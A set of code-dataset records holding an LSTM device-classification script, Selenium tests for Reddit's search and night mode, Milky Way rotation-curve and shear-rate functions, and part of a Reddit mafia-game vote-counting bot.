range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,1,0,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_5\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_5\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,0,1,0,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_6\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_6\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,0,0,1,0,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_7\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_7\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,0,0,0,1,0])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\tif len(os.listdir(os.path.join(os.getcwd(),path,\"class_8\"))) != 0:\r\n\t\t\t\tX_test_files.extend(np.random.choice(os.listdir(os.path.join(os.getcwd(),path,\"class_8\")),test_files_perClass))\r\n\t\t\t\tfor i in range(0,test_files_perClass):\r\n\t\t\t\t\ty_test_overall.append([0,0,0,0,0,0,0,0,1])\r\n\t\t\t\ttest_total_files += test_files_perClass\r\n\t\t\t\r\n\t\t\tprint(\"Shuffling Test Data\")\r\n\t\t\tindex_shuf = list(range(len(X_test_files)))\r\n\t\t\trandom.shuffle(index_shuf)\r\n\r\n\t\t\tlabel_dist = {\"0\":[], \"1\":[], \"2\":[], \"3\":[], \"4\":[], \"5\":[], \"6\":[], \"7\":[], \"8\":[]}\r\n\t\t\t\r\n\t\t\tfor i in index_shuf:\r\n\t\t\t\tclass_index = np.argmax(np.array(y_test_overall[i]))\r\n\t\t\t\tclass_name = str(\"class_\" + str(class_index))\r\n\r\n\t\t\t\tf = open(os.path.join(path, class_name, str(X_test_files[i])))\r\n\t\t\t\tconv_file = csv.reader(f, delimiter=',')\r\n\t\t\t\tconv = []\r\n\t\t\t\tfor row in conv_file:\r\n\t\t\t\t\tif len(row) > 0:\r\n\t\t\t\t\t\ttL = []\r\n\t\t\t\t\t\ttL.append(float(row[0]))\r\n\t\t\t\t\t\ttL.append(float(row[1]))\r\n\t\t\t\t\t\tconv.append(tL)\r\n\t\t\t\tX_test.append(conv)\r\n\t\t\t\ty_test.append(y_test_overall[i])\r\n\t\t\t\tf.close()\r\n\r\n\t\t\tlabel = 0\r\n\t\t\tfor c in X_test:\r\n\t\t\t\ty = y_test[label]\r\n\t\t\t\tTF, max_index, label_dist = test_neural_network(sess,pred,xplaceholder,yplaceholder,c,y,max_distance, label_dist)\r\n\t\t\t\tfor i in range(len(y)):\r\n\t\t\t\t\tif y[i] == 1 and TF:\r\n\t\t\t\t\t\tTrue_Number[str(i)] += 1\r\n\t\t\t\t\t\tTotal_Number[str(i)] += 1\r\n\t\t\t\t\telif y[i] == 1:\r\n\t\t\t\t\t\tTotal_Number[str(i)] += 1\r\n\t\t\t\t\t\twrong_id[str(\"class_\" + str(i))][str(max_index)] += 1\r\n\t\t\t\tlabel += 1\r\n\t\t\t\r\n\t\tmax_distance = __findMaxDist(label_dist)\r\n\r\n\t\tprint(\"Correctly predicted convs: \")\r\n\t\tprint(json.dumps(True_Number, sort_keys=True))\r\n\t\twith open(\"True_Number_Convs.json\", \"w\") as f:\r\n\t\t\tjson.dump(True_Number, f)\r\n\r\n\t\tprint(\"Total convs tested: \")\r\n\t\tprint(json.dumps(Total_Number, sort_keys=True))\r\n\t\twith open(\"Total_Number_Convs.json\", \"w\") as f:\r\n\t\t\tjson.dump(True_Number, f)\r\n\r\n\t\tprint(\"Max distance for each class: \")\r\n\t\tprint(json.dumps(max_distance, sort_keys=True))\r\n\t\twith open(\"max_distance.json\", 
\"w\") as f:\r\n\t\t\tjson.dump(max_distance, f)\r\n\r\n\t\tprint(\"Incorrect Labels: \")\r\n\t\tprint(json.dumps(wrong_id, sort_keys=True))\r\n\t\twith open(\"Incorrect_Labels.json\", \"w\") as f:\r\n\t\t\tjson.dump(wrong_id, f)\r\n\r\n\treturn\r\n\r\n\t\r\n\r\ndef recurrent_neural_network_model(xplaceholder, n_features, n_units, n_classes):\r\n # giving the weights and biases random values\r\n\tlayer ={ 'weights': tf.Variable(tf.random.normal([n_units, n_classes])),'bias': tf.Variable(tf.random.normal([n_classes]))}\r\n\r\n\t#x = tf.reshape(xplaceholder, [-1, n_features])\r\n\tx = tf.split(xplaceholder, n_features, 1)\r\n\r\n # x is a 2-dimensional Tensor and it is sliced along the dimension 1 (columns),\r\n # each slice is an element of the sequence given as input to the LSTM layer.\r\n # creates a LSTM layer and instantiates variables for all gates.\r\n # rnn_size is the size of your hidden state (both c and h in a LSTM).\r\n\t#lstm_cell = tf.compat.v1.nn.rnn_cell.LSTMCell(n_units)\r\n\tlstm_cell = tf.compat.v1.nn.rnn_cell.MultiRNNCell([tf.compat.v1.nn.rnn_cell.LSTMCell(n_units),tf.compat.v1.nn.rnn_cell.LSTMCell(n_units)])\r\n # outputs contains the output for each slice of the layer\r\n # sate contains the final values of the hidden state\r\n\toutputs, states = tf.compat.v1.nn.static_rnn(lstm_cell, x, dtype=tf.float32)\r\n\t\r\n # for each element (, 1)) of the input sequence.\r\n\toutput = tf.matmul(outputs[-1], layer['weights']) + layer['bias']\r\n\t\r\n\treturn output\r\n\r\ndef setup_neural_network(xplaceholder, yplaceholder, n_features, n_units, n_classes):\r\n\tlogit = recurrent_neural_network_model(xplaceholder, n_features, n_units, n_classes)\r\n\r\n\tlogit = tf.reshape(logit, [-1, n_classes])\r\n\tprint(logit.shape)\r\n\r\n\tcorrect_pred = tf.equal(tf.argmax(logit,1), tf.argmax(yplaceholder))\r\n\taccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32),name=\"accuracy\")\r\n\r\n\tpred = tf.nn.softmax(logit, name=\"pred\")\r\n\r\n\tcost = tf.reduce_mean(tf.compat.v2.nn.softmax_cross_entropy_with_logits(logits=logit, labels=yplaceholder), name=\"cost\")\r\n\toptimizer = tf.compat.v1.train.AdamOptimizer().minimize(cost)\r\n\treturn cost, optimizer, logit, accuracy, pred\r\n\r\ndef train_neural_network(sess, X_train,y_train,xplaceholder,yplaceholder,cost,optimizer, accuracy, iters):\r\n\tloss_total = 0\r\n\tloss = 0\r\n\ti = 0\r\n\tbatch_loss = 0\r\n\tbatch_acc = 0\r\n\ttotal_acc = 0\r\n\tfor i in range(8):\r\n\t\tfor c in range(len(X_train)):\r\n\t\t\tbatch_x = np.array(X_train[c])\r\n\t\t\tbatch_y = np.array(y_train[c])\r\n\t\t\t# runs the computation subgraph necessary for the specified operation.\r\n\t\t\t_, loss, acc = sess.run([optimizer, cost, accuracy], feed_dict={xplaceholder: batch_x, yplaceholder: batch_y})\r\n\t\t\tbatch_loss += loss\r\n\t\t\tbatch_acc += acc\r\n\t\tloss_total += batch_loss\r\n\t\ttotal_acc += batch_acc\r\n\t\tbatch_acc = 0\r\n\t\tbatch_loss = 0\r\n\t\ti += 1\r\n\ttotal_acc_forEpoch = (total_acc/(iters*8))\r\n\tprint(\"Total loss for 8 epochs in train: \", loss_total)\r\n\tprint(\"Total accuracy for 8 epoch in train: \", total_acc_forEpoch)\r\n\treturn total_acc_forEpoch\r\n\r\ndef test_neural_network(sess, pred, xplaceholder, yplaceholder,c, y_test, max_distance, label_dist):\r\n\tprediction = pred.eval({xplaceholder: np.array(c), yplaceholder: np.array(y_test)}, session=sess)\r\n\t#pred = tf.nn.softmax(logit, name=\"pred\").eval({xplaceholder: np.array(c), yplaceholder: np.array(y_test)}, session=sess)\r\n\t#pred = 
tf.round(tf.nn.softmax(logit)).eval({xplaceholder: np.array(c), yplaceholder: np.array(y_test)})\r\n\tlast_pred = np.array(prediction[len(c)-1])\r\n\tmax_val = np.argmax(last_pred)\r\n\tlabel = np.argmax(np.array(y_test))\r\n\tcorrect = (y_test[max_val] == 1)\r\n\r\n\tdist = np.linalg.norm(np.array(y_test) - last_pred)\r\n\tlabel_dist[str(label)].append(dist)\r\n\t\"\"\"\r\n\t# Calc distance and compare to max\r\n\tif correct and last_pred[max_val] >= 0.80: # Accuracy greater than or equal to 80%\r\n\t\tdist = np.linalg.norm(np.array(y_test) - last_pred)\r\n\t\tif max_distance[str(max_val)] < (dist * 1.1):\r\n\t\t\tmax_distance[str(max_val)] = dist * 1.1 # 1.1 to add 10% buffer\r\n\t\"\"\"\r\n\r\n\treturn correct, max_val, label_dist\r\n\r\ndef __findMaxDist(label_dist):\r\n\tmax_dist = {}\r\n\t\r\n\tfor key in label_dist:\r\n\t\torder_dist = label_dist[key]\r\n\t\tif order_dist != []:\r\n\t\t\torder_dist.sort()\r\n\t\t\t\"\"\"\r\n\t\t\t#For testing\r\n\t\t\tld = np.asarray(order_dist)\r\n\t\t\twith open(os.path.join(os.getcwd(),str(\"distance\" + \"-\" + str(key) + \".csv\")), 'wb') as f:\r\n\t\t\t\tnp.savetxt(f, ld, delimiter=\",\")\r\n\t\t\t\"\"\"\r\n\t\t\tlabel_dist[key] = order_dist\r\n\t\t\tdist_len = len(order_dist)\r\n\t\t\t\"\"\"\t\r\n\t\t\tmedian = order_dist[int(dist_len*.5)]\r\n\t\t\tQ1 = order_dist[int(dist_len*.25)]\r\n\t\t\tQ3 = order_dist[int(dist_len*.75)]\r\n\t\t\tIQR = Q3 - Q1\r\n\t\t\t\r\n\t\t\tmaximum = Q3 + 1.5*IQR\r\n\t\t\t\"\"\"\r\n\t\t\tboundary = int(dist_len*.9) # Boundary set at 90%\r\n\t\t\tmaximum = order_dist[boundary]\r\n\r\n\t\t\tmax_dist[key] = maximum\r\n\treturn max_dist\r\n\r\nmain()","repo_name":"baholman/Neural-Network-for-Device-Detection","sub_path":"Neural_Network_tf_fromCSV.py","file_name":"Neural_Network_tf_fromCSV.py","file_ext":"py","file_size_in_byte":17380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11348130248","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\nclass Testing_Class:\n def test_Search(self):\n browser = webdriver.Chrome(ChromeDriverManager().install())\n browser.get(\"https://www.reddit.com/\")\n browser.implicitly_wait(30)\n browser.find_element(By.ID, \"header-search-bar\").send_keys(\"cats\")\n browser.find_element(By.ID, \"header-search-bar\").send_keys(Keys.RETURN)\n expected_text = \"r/cats\"\n found_text = browser.find_element(\n By.XPATH, \"//*[contains(text(), '{0}')]\".format(expected_text)\n ).text\n browser.close()\n assert expected_text == found_text\n\n def test_NightMode(self):\n browser = webdriver.Chrome(ChromeDriverManager().install())\n browser.get(\"https://www.reddit.com/\")\n browser.implicitly_wait(30)\n browser.find_element(By.ID, \"USER_DROPDOWN_ID\").click()\n browser.find_elements(\n By.XPATH, \"//*[contains(text(), '{0}')]\".format(\"Night Mode\")\n )[0].click()\n browser.find_element(By.ID, \"USER_DROPDOWN_ID\").click()\n res = browser.find_element(\n By.CSS_SELECTOR,\n \"button[role='switch']\",\n ).get_attribute(\"aria-checked\")\n browser.close()\n assert res == \"true\"\n","repo_name":"Den-Kov59/UI_Tests","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2918482628","text":"import numpy as np\n\ndef solid_body_rotation_curve(R, R_d=1.0, 
Rsun=8.5, V0=220, normalize=True):\n \"\"\"\n Solid body rotation curve for testing.\n\n .. math::\n V(R) = R\n\n Parameters\n ----------\n R : float or array\n cylindrical radius\n \"\"\"\n V = R * R_d / Rsun\n if not normalize:\n V *= V0\n return V\n\n\ndef constant_shear_rate(R, R_d=1.0, Rsun=8.5, S0=25, normalize=True):\n \"\"\"\n Constant shear for testing.\n\n .. math::\n V(R) = cte\n\n Parameters\n ----------\n R : float or array\n cylindrical radius\n \"\"\"\n S = np.ones_like(R)\n if not normalize:\n S *= S0\n return S\n\n\ndef simple_rotation_curve(R, R_d=1.0, Rsun=8.5, V0=220, normalize=True,\n fraction=0.25/8.5):\n r\"\"\"\n Simple flat rotation curve\n\n .. math::\n V = V_0 \\left[1-\\exp(-R/(f R_\\odot)\\right]\n\n with fraction :math:`= f`, Rsun :math:`= R_\\odot`, V0 :math:`= V_0`\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n Rsun : float or array\n sun's radius in kpc. Default: 8.5 kpc\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n V0 : float\n Circular velocity at infinity (i.e. at the flat part).\n Default: 220 (km/s)\n fraction : float\n Fraction of the solar radius at which the profile decays\n exponentially. Default: 0.03 (i.e. 250 pc for Rsun=8.5).\n normalize : bool\n If True , with result normalized to unit at solar radius,\n if False, the result will be in units of `V0`.\n\n Returns\n -------\n same as `R`\n rotation curve\n \"\"\"\n V = V0*(1.0-np.exp(-R*R_d/(fraction*Rsun)))\n if normalize:\n Vsol = simple_rotation_curve(Rsun, R_d=1.0, Rsun=Rsun, V0=V0,\n normalize=False, fraction=fraction)\n V /= Vsol\n return V\n\n\ndef simple_shear_rate(R, R_d=1.0, Rsun=8.5, V0=220, normalize=True,\n fraction=0.25/8.5):\n \"\"\"\n A simple shear rate profile, compatible with the\n :func:`simple_rotation_curve` .\n\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n Rsun : float or array\n sun's radius in kpc. Default: 8.5 kpc\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n V0 : float\n Circular velocity at infinity (i.e. at the flat part).\n Default: 220 (km/s)\n fraction : float\n Fraction of the solar radius at which the profile decays\n exponentially. Default: 0.03 (i.e. 
250 pc for Rsun=8.5).\n normalize : bool\n If True , with result normalized to unit at solar radius,\n if False, the result will be in km/s for R and Rsun in kpc\n\n Returns\n -------\n same as `R`\n shear rate\n \"\"\"\n # Computes the shear rate ( rdOmega/dr = dV/dr - V/r )\n x = R*R_d/(fraction*Rsun)\n dVdr = V0/(fraction*Rsun)*np.exp(-x)\n Omega = V0*(1.0-np.exp(-x))/(R*R_d)\n S = dVdr - Omega\n if normalize:\n Ssol = simple_shear_rate(Rsun, R_d=1.0, Rsun=Rsun, V0=V0,\n normalize=False, fraction=fraction)\n S /= Ssol\n return S\n\n# Coefficients used in the polynomial fit of Clemens (1985)\ncoef_Clemens = {\n 'A': [-17731.0,54904.0, -68287.3, 43980.1, -15809.8, 3069.81, 0.0],\n 'B': [-2.110625, 25.073006, -110.73531, 231.87099, -248.1467, 325.0912],\n 'C': [0.00129348, -0.08050808, 2.0697271, -28.4080026, 224.562732,\n -1024.068760,2507.60391, -2342.6564],\n 'D': [234.88] }\n# Ranges used in the polynomial fit of Clemens (1985)\nranges_Clemens = {\n 'A': [0,0.09],\n 'B': [0.09,0.45],\n 'C': [0.45,1.60],\n 'D': [1.60,1000]\n }\n\ndef Clemens_Milky_Way_rotation_curve(R, R_d=1.0, Rsun=8.5, normalize=True):\n \"\"\"\n Rotation curve of the Milky Way obtained by `Clemens (1985)\n `_\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n Rsun : float or array\n sun's radius in kpc. Default: 8.5 kpc\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n normalize : bool\n If True , with result normalized to unit at solar radius,\n if False, the result will be in km/s for R and Rsun in kpc\n\n Returns\n -------\n same as `R`\n rotation curve\n \"\"\"\n\n # If the function was called for a scalar\n if not hasattr(R, \"__len__\"):\n R = np.array([R,])\n scalar = True\n else:\n scalar = False\n V = R.copy()\n\n for x in coef_Clemens:\n # Construct polynomials\n pol_V = np.poly1d(coef_Clemens[x])\n # Reads the ranges\n min_r, max_r = ranges_Clemens[x]\n # Sets the index (selects the relevant range)\n idx = R*R_d/Rsun >= min_r\n idx *= R*R_d/Rsun < max_r\n # Computes the shear rate ( rdOmega/dr = dV/dr - V/r )\n V[idx] = pol_V(R[idx]*R_d)\n\n if normalize:\n # Normalizes at solar radius\n Vsol = Clemens_Milky_Way_rotation_curve(Rsun, R_d=1.0, Rsun=Rsun,\n normalize=False)\n V /= Vsol\n\n if scalar:\n V = V[0]\n\n return V\n\n\ndef Clemens_Milky_Way_shear_rate(R, R_d=1.0, Rsun=8.5, normalize=True):\n \"\"\"\n Shear rate of the Milky Way based on the rotation curve obtained by\n `Clemens (1985) `_\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n Rsun : float or array\n sun's radius in kpc. Default: 8.5 kpc\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. 
Default: 1.0\n normalize : bool\n If True , with result normalized to unit at solar radius,\n if False, the result will be in km/s for R and Rsun in kpc\n\n Returns\n -------\n same as `R`\n shear rate profile, with\n \"\"\"\n\n # If the function was called for a scalar\n if not hasattr(R, \"__len__\"):\n R = np.array([R,])\n scalar = True\n else:\n scalar = False\n S = R.copy()\n\n for x in coef_Clemens:\n # Construct polynomials\n pol_V = np.poly1d(coef_Clemens[x])\n dVdr = pol_V.deriv()\n\n # Reads the ranges\n min_r, max_r = ranges_Clemens[x]\n # Sets the index (selects the relevant range)\n idx = R*R_d/Rsun >= min_r\n idx *= R*R_d/Rsun < max_r\n # Computes the shear rate ( rdOmega/dr = dV/dr - V/r )\n S[idx] = dVdr(R[idx]*R_d) - pol_V(R[idx]*R_d)/(R[idx]*R_d)\n\n if normalize:\n # Normalizes at solar radius\n Ssol = Clemens_Milky_Way_shear_rate(Rsun, R_d=1.0, Rsun=Rsun,\n normalize=False)\n S /= Ssol\n\n if scalar:\n S = S[0]\n\n return S\n\n\ndef constant_scale_height(R, h_d=1.0, R_d=1.0, Rsun=8.5):\n \"\"\" Constant scale height for testing.\"\"\"\n return np.ones_like(R)*h_d\n\n\ndef exponential_scale_height(R, h_d=1.0, R_HI=5, R_d=1.0, Rsun=8.5):\n r\"\"\"\n Exponential disk scale-heigh profile profile\n\n .. math::\n h(R)=\\exp\\left(\\frac{R-R_\\odot}{R_{\\rm sh}}\\right)\n\n Parameters\n ----------\n R : float or array\n radial coordinate\n h_d : float\n normalization of the scaleheight. Default: 1.0\n R_d : float\n unit of R in kpc [e.g. R_d=(disk radius in kpc)\n for r=0..1 within the disk]. Default: 1.0\n R_HI : float\n Parameter :math:`R_{\\rm sh}`, characterizes how \"flared\" the disc is.\n Rsun : float\n Sun's radius in kpc. Default: 8.5 kpc\n\n Returns\n ----------\n same as `R`\n scale height normalized to h_d at the solar radius\n \"\"\"\n # Makes sure we are dealing with an array\n return h_d * np.exp((R*R_d - Rsun)/R_HI)\n\n\ndef Omega(rotation_curve, R, Rsun=8.5, R_d=1.0, normalize=True, **kwargs):\n \"\"\"\n Simple wrapper to avoid making mistakes when using dimensionless\n (aka normalized) quantities.\n \"\"\"\n\n V = rotation_curve(R, R_d=R_d, Rsun=Rsun, normalize=normalize, **kwargs)\n\n Om = V/(R*R_d)\n if normalize:\n Om = Om * Rsun\n return Om\n\ndef regularize(r, Om, S, r_reg, Om_reg, k=4):\n \"\"\"\n Avoids unphysically large values of Omega and Shear near the origin\n applying an exponential cutoff on Omega to prevent it.\n\n .. math::\n \\Omega(r) = \\exp\\left[-(r_\\\\xi/r)^k\\\\right]\\left[ \\\\tilde\\Omega(r)-\\Omega_\\\\xi\\\\right] + \\Omega_\\\\xi\\,,\n\n and\n\n .. math::\n S(r) = e^{-(r_\\\\xi/r)^k}\\left\\{k\\left(\\\\frac{r_\\\\xi}{r}\\\\right)^k\\\\left[\\\\tilde\\Omega(r)\n -\\Omega_\\\\xi \\\\right] +\\\\tilde S \\\\right\\}\n\n\n Parameters\n ----------\n R : array\n radial coordinate\n Om : float\n Angular velocity profile\n r_reg : float\n regularization radius\n Om_reg : float\n Value of Omega to be used for math:`r \\lesssim r_{reg`\n k : float\n How sharp is the cutoff. 
Default: 4\n\n \"\"\"\n # Sets up exponential cutoff function\n f = lambda x: np.exp(-(x/r_reg)**-k)\n # Applies it in a d2o-compatible manner\n exp_cut = distribute_function(f, r)\n\n Om_new = exp_cut*(Om-Om_reg) + Om_reg\n\n S_new = exp_cut*( k*(r_reg/r)**k*(Om-Om_reg) + S)\n\n return Om_new, S_new\n\n","repo_name":"luizfelippesr/galmag","sub_path":"galmag/disk_profiles.py","file_name":"disk_profiles.py","file_ext":"py","file_size_in_byte":9418,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"29055536842","text":"#!/usr/bin/env python2.7\n\nimport os\nimport re\nimport praw\nimport json\nimport copy\nimport time\nimport pytz\nimport creds\nimport config\nimport os.path\nimport logging\nimport argparse\nimport requests\nimport datetime\nimport traceback\nimport prettylog\nimport collections\nimport praw.objects\nimport simpletemplate\n\nfrom HTMLParser import HTMLParser\n\nl = prettylog.ColoredLogger(__name__)\n\ndebug_levels = {\n \"critical\": logging.CRITICAL,\n \"error\": logging.ERROR,\n \"warning\": logging.WARNING,\n \"info\": logging.INFO,\n \"debug\": logging.DEBUG\n}\n\nparser = argparse.ArgumentParser(description=\"Plounge mafia vote counting bot\")\nparser.add_argument(\"--log_level\", help=\"Log level to use\", choices =\n debug_levels.keys(), default = 'info')\nparser.add_argument(\"--oneshot\", action='store_true', help=\"run state transition once\")\nparser.add_argument(\"--update_delay\", type=int, default=5, help=\"time in minutes between state updates\")\nparser.add_argument(\"--dry-run\", action='store_true', help=\"Don't actually post anything\")\nparser.add_argument(\"--oauth-login\", action='store_true', help=\"perform Oauth login\")\n\nVote = collections.namedtuple(\"Vote\", [\"by\", \"target\", \"time\"])\nNomination = collections.namedtuple('Nomination', ['player', 'yays', 'nays', 'up_for_trial', 'vote_post_id', 'timestamp'])\n\ndef Tree(dict_ = {}):\n tree = collections.defaultdict(Tree)\n tree.update(dict_)\n return tree\n\ndef chunk(l,n):\n for i in range(0,len(l),n):\n yield l[i:i+n]\n\nknown_dead_comments = set()\n\n#replace_more_comments is broken because MoreComments.comments() is broken.\n#This is broken I think because the reddit API is broken and doesn't return an\n#additional morecomments object when it should. 
This also affects the website\ndef get_more_comments(self, update = True):\n if self._comments is not None:\n return self._comments\n\n children = {x for x in self.children if 't1_{}'.format(x)\n not in self.submission._comments_by_id}\n\n self._comments = []\n if not children:\n return self._comments\n\n n_attempts = 0\n old_len = len(children)\n while children:\n data = {'children': ','.join(children),\n 'link_id': self.submission.fullname,\n 'r': str(self.submission.subreddit)}\n\n\n if self.submission._comment_sort:\n data['where'] = self.submission._comment_sort\n\n url = self.reddit_session.config['morechildren']\n response = self.reddit_session.request_json(url, data = data)\n self._comments.extend(response['data']['things'])\n children.difference_update(set([x.id for x in self._comments]))\n n_attempts += 1\n if n_attempts > 10 or old_len == len(children):\n if not children.issubset(known_dead_comments):\n l.error(\"Could not fetch comments {} after {} attempts\".format(children, n_attempts))\n known_dead_comments.update(children)\n break\n old_len = len(children)\n\n if update:\n for comment in self._comments:\n comment._update_submission(self.submission)\n\n return self._comments\n\n#replace_more_comments is broken (plus makes more requests than we need)\ndef all_comments(replies):\n more_comments = []\n for reply in replies:\n if isinstance(reply, praw.objects.MoreComments):\n more_comments.append(reply)\n else:\n yield reply\n while more_comments:\n more = more_comments.pop()\n maybe_more = get_more_comments(more)\n for additional_comment in get_more_comments(more):\n if isinstance(additional_comment, praw.objects.MoreComments):\n more_comments.append(additional_comment)\n else:\n yield additional_comment\n\nnominate_re = re.compile(\"\"\"\n(nominate|vote|lynch)? #vote or nominate is for clarity only, they have the same effect\n\\s*:?\\s* #could be a colon or not\n(/u/)? #might start with /u/\n(?Pno\\s*lynch|[^.*~\\s]+) #username may consist of any characters except whitespace and *\n #'no lynch' is valid in traditional games, and contains a space\n\"\"\", re.VERBOSE)\n\nvote_re = re.compile(\"\"\"\n(vote)?:? #can start with vote or not\n\\s*\n(?P\n yay|lynch|yes|second| #many yes or no options. 
Must be synced with\n nay|pardon|no) # get_vote_from_post()\n\"\"\", re.VERBOSE)\n\nclass RedditHTMLParser(HTMLParser):\n def __init__(self):\n HTMLParser.__init__(self)\n self.nest_count = collections.defaultdict(int)\n self.possible_votes = []\n\n def handle_starttag(self, tag, attrs):\n self.nest_count[tag] += 1\n\n def handle_endtag(self, tag):\n self.nest_count[tag] -= 1\n\n def handle_data(self, data):\n if self.nest_count[\"strong\"] > 0 and self.nest_count[\"del\"] == 0:\n self.possible_votes.append(data)\n\ndef get_possible_votes(post_contents):\n parser = RedditHTMLParser()\n parser.feed(parser.unescape(post_contents))\n return parser.possible_votes\n\ndef get_nomination_from_post(post_contents, valid_names):\n valid_votes = []\n for possible_vote in get_possible_votes(post_contents):\n for match in nominate_re.finditer(possible_vote.lower().strip()):\n if not match.group('user'):\n continue\n username = match.group('user').strip().lower()\n if username in valid_names:\n valid_votes.append(username)\n if valid_votes:\n return valid_votes[-1]\n\ndef get_vote_from_post(post_contents):\n valid_votes = []\n for possible_vote in get_possible_votes(post_contents):\n for match in vote_re.finditer(possible_vote.lower().strip()):\n if not match.group('vote'):\n continue\n vote = match.group('vote').strip().lower()\n if vote in ('yay', 'lynch', 'yes', 'second'):\n valid_votes.append(True)\n elif vote in ('nay', 'pardon', 'no'):\n valid_votes.append(False)\n if valid_votes:\n return valid_votes[-1]\n\ndef compare_dicts(old, new):\n old_items = set([(k,) + tuple(v.items()) for k,v in old.iteritems()])\n new_items = set([(k,) + tuple(v.items()) for k,v in new.iteritems()])\n\n additions = new_items.difference(old_items)\n removals = old_items.difference(new_items)\n\n additions = {i[0]: dict(i[1:]) for i in additions}\n removals = {i[0]: dict(i[1:]) for i in removals}\n\n return additions, removals\n\ndef get_edited_time(comment):\n return comment.edited if comment.edited else comment.created_utc\n\ndef timestamp_to_date(timestamp):\n return datetime.datetime.fromtimestamp(timestamp, pytz.utc).isoformat()\n\nclass VoteBot(object):\n def __init__(self, reddit, credentials, args):\n self.bot_username = credentials.bot_username\n self.bot_password = credentials.bot_password\n self.authorized_users = args.authorized_users\n self.known_invalid_votes = set()\n self.state = Tree()\n self.reddit = reddit\n self.args = args\n self.max_trials = 5\n\n def setup_dir(self):\n if not os.path.exists(self.args.output_dir):\n os.makedirs(self.args.output_dir)\n\n def process_commands(self):\n l.debug(\"Processing commands for {}\".format(self.args.name))\n new_state = copy.deepcopy(self.state)\n pms = self.reddit.get_inbox(limit = None)\n have_nominations = False\n have_votes = False\n most_recent_id = None\n alive_players = set(new_state[\"alive_players\"])\n dead_players = set(new_state[\"dead_players\"])\n voteless_players = set(new_state[\"voteless_players\"])\n voteless_players.difference_update(dead_players)\n alive_players.difference_update(dead_players)\n pms_reversed = []\n for pm in pms:\n if \":\" not in pm.subject:\n continue\n game_name, command = pm.subject.split(':')\n game_name = game_name.lower().strip()\n command = command.lower().strip()\n if not (game_name == self.args.name.lower() or game_name == \"*\"):\n continue\n if pm.id == self.state['most_recent_pm_id']:\n break\n if not most_recent_id:\n most_recent_id = pm.id\n if pm.author.name.lower() not in self.authorized_users:\n continue\n 
pms_reversed.append(pm)\n if command == \"reset\":\n break\n\n pms_reversed.reverse()\n for pm in pms_reversed:\n game_name, command = pm.subject.split(':')\n game_name = game_name.lower().strip()\n command = command.lower().strip()\n l.debug('command: {}'.format(command))\n if command == \"end nominations\" and not have_nominations:\n l.info(\"Command: end nominations\")\n new_state['nominations_ended_at'] = pm.created_utc\n have_nominations = True\n if command == \"end votes\" and not have_votes:\n l.info(\"Command: end votes\")\n new_state['votes_ended_at'] = pm.created_utc\n have_votes = True\n if command == \"nominations\" and not have_nominations:\n l.info(\"Command: new nominations thread\")\n new_state['nominations_url'] = pm.body\n new_state['nominations_ended_at'] = None\n new_state['counting_nominations'] = True\n have_nominations = True\n if command == \"votes\" and not have_votes:\n l.info(\"Command: new votes thread\")\n new_state['votes_url'] = pm.body.split()[0]\n new_state['nominated_players'] = pm.body.split()[1:]\n new_state['votes_ended_at'] = None\n new_state['vote_threshold'] = None\n new_state['counting_votes'] = True\n have_votes = True\n if command in ('alive', 'dead', 'gone', 'voteless', 'voteful'):\n player_set = set([x.lower() for x in pm.body.split() if len(x) > 3])\n if command == \"alive\":\n l.info(\"Command: alive players\")\n alive_players.update(player_set)\n elif command == \"dead\":\n l.info(\"Command: dead players\")\n alive_players.difference_update(player_set)\n dead_players.update(player_set)\n elif command == \"gone\":\n l.info(\"Command: gone players\")\n alive_players.difference_update(player_set)\n dead_players.difference_update(player_set)\n voteless_players.difference_update(player_set)\n elif command == \"voteless\":\n l.info(\"Voteless players\")\n voteless_players.update(player_set)\n elif command == \"voteful\":\n l.info(\"Voteful players\")\n voteless_players.difference_update(player_set)\n else:\n l.warning(\"Unknown command {}\".format(command))\n if command == \"max nominations\":\n try:\n self.max_trials = int(pm.body.strip())\n except ValueError:\n l.warning(\"Got invalid value for max nominations: {}\".format(pm.body.strip()))\n if command == \"reset\":\n l.warning(\"Got reset command\")\n new_state = Tree()\n alive_players = set()\n dead_players = set()\n voteless_players = set()\n if command == \"vote 